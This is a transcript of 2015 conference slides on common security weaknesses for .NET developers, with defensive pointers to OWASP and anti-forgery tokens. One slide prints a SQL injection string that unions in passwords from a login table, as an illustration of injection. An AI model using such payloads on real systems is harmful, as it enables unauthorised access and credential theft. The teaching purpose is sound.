top security threats for .net developers
TRANSCRIPT
![Page 1: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/1.jpg)
Top Security Threats for .NET developers
Mikhail ShcherbakovProduct Manager at Cezurity
10-я конференция .NET разработчиков19 апреля 2015dotnetconf.ru
![Page 2: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/2.jpg)
About me
Product Manager at Cezurity One of the core developers of the source
code analyzer PT Application Inspector Former Team Lead at Acronis, Luxoft,
Boeing, SPC KRUG
![Page 3: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/3.jpg)
Security DevelopmentWhere to Begin?
![Page 4: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/4.jpg)
Security Development
![Page 5: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/5.jpg)
Security Development
How to write code?
![Page 6: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/6.jpg)
Glossary
![Page 7: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/7.jpg)
Glossary
Threat - a potential violation of security (ISO 7498-2).
Impact - consequences for an organization or environment when an attack is realized, or weakness is present.
Attack - a well-defined set of actions that, if successful, would result in either damage to an asset, or undesirable operation.
![Page 8: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/8.jpg)
Glossary
Weakness - a type of mistake in software that, in proper conditions, could contribute to the introduction of vulnerabilities within that software.
Vulnerability - an occurrence of a weakness (or multiple weaknesses) within software, in which the weakness can be used by a party to cause the software to modify or access unintended data, interrupt proper execution, or perform incorrect actions that were not specifically granted to the party who uses the weakness.
![Page 9: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/9.jpg)
Glossary
Need to Deal with Weaknesses!
![Page 10: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/10.jpg)
Classifications
![Page 11: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/11.jpg)
Classifications
https://www.owasp.org/index.php/Category:Attack
![Page 12: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/12.jpg)
Classifications
https://www.owasp.org/index.php/Category:Vulnerability
![Page 13: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/13.jpg)
Classifications
http://projects.webappsec.org/w/page/13246978/Threat%20Classification
![Page 14: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/14.jpg)
Classifications
Create a classification for developers!
![Page 15: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/15.jpg)
Improper Input/Output Handling Implementation
![Page 16: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/16.jpg)
Improper Input/Output Handling SQL Injection OS Commanding XML Injection XPath Injection XQuery Injection LDAP Injection Cross-site scripting
(XSS)
Unrestricted File Upload
Path Traversal HTTP Response
Splitting Content Spoofing Buffer Overflow
![Page 17: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/17.jpg)
Injection Anatomy
![Page 18: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/18.jpg)
Input Data
’ OR 1=1 --‘ union all select password FROM CustomerLogin WHERE email = ‘[email protected]'--
![Page 19: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/19.jpg)
Injection Anatomy
![Page 20: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/20.jpg)
SQL Injection with EF
Show me code!
![Page 21: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/21.jpg)
Cross-site scripting (XSS)
Reflected Stored DOM-based
![Page 22: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/22.jpg)
Stored XSS
Show me code!
![Page 23: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/23.jpg)
DOM-based XSS
Show me code!
![Page 24: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/24.jpg)
Insufficient Control Flow ManagementDesign/Implementation
![Page 25: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/25.jpg)
Insufficient Control Flow Management Cross-Site Request Forgery (CSRF) Mass Assignment Business Logic Errors Abuse of Functionality
![Page 26: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/26.jpg)
CSRF
![Page 27: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/27.jpg)
CSRF
ASP.NET MVC <%= Html.AntiForgeryToken() %>
<input name="__RequestVerificationToken" type="hidden“ …
ASP.NET Web Forms __VIEWSTATE, __EVENTVALIDATION
http://www.jardinesoftware.com/Documents/ASP_Net_Web_Forms_CSRF_Workflow.pdf
![Page 28: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/28.jpg)
Business Logic Error
Samples
![Page 29: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/29.jpg)
Sensitive Data ExposureDesign/Implementation/Deployment
![Page 30: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/30.jpg)
Sensitive Data Exposure
Insufficient Transport Layer Protection Insecure Cryptographic Storage Insufficient Client-side Data Protection
![Page 31: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/31.jpg)
Improper Access ControlDesign/Implementation/Deployment
![Page 32: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/32.jpg)
Improper Access Control
Insufficient Authentication Insufficient Authorization Insufficient Password Recovery Insufficient Session Expiration Credential/Session Prediction Improper File System Permissions Brute Force Insufficient Anti-automation
![Page 33: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/33.jpg)
Secure MisconfigurationDeployment
![Page 34: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/34.jpg)
Secure Misconfiguration
Application Misconfiguration Server Misconfiguration Information Exposure Through an Error
Message Information Leakage Directory Indexing Insecure Indexing Using Components with Known
Vulnerabilities
![Page 35: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/35.jpg)
Summary
OWASP Top Ten Project (2010/2013) http://bit.ly/1OffewO
OWASP .NET Project http://bit.ly/1cz62Sv Vladimir Kochetkov Blog
http://bit.ly/1DecXWI Troy Hunt Blog www.troyhunt.com OWASP Developer Guide
http://bit.ly/1JcQLoh CWE/SANS Top 25 Most Dangerous
Software Errors (2011) http://bit.ly/1bjDTOH
![Page 36: Top Security Threats for .NET Developers](https://reader030.vdocument.in/reader030/viewer/2022032619/55c2e906bb61eb4f528b45e3/html5/thumbnails/36.jpg)
Thank you for your attention!
Mikhail Shcherbakov
linkedin.com/in/mikhailshcherbakov
github.com/yuske
@yu5k3
Product Manager at Cezurity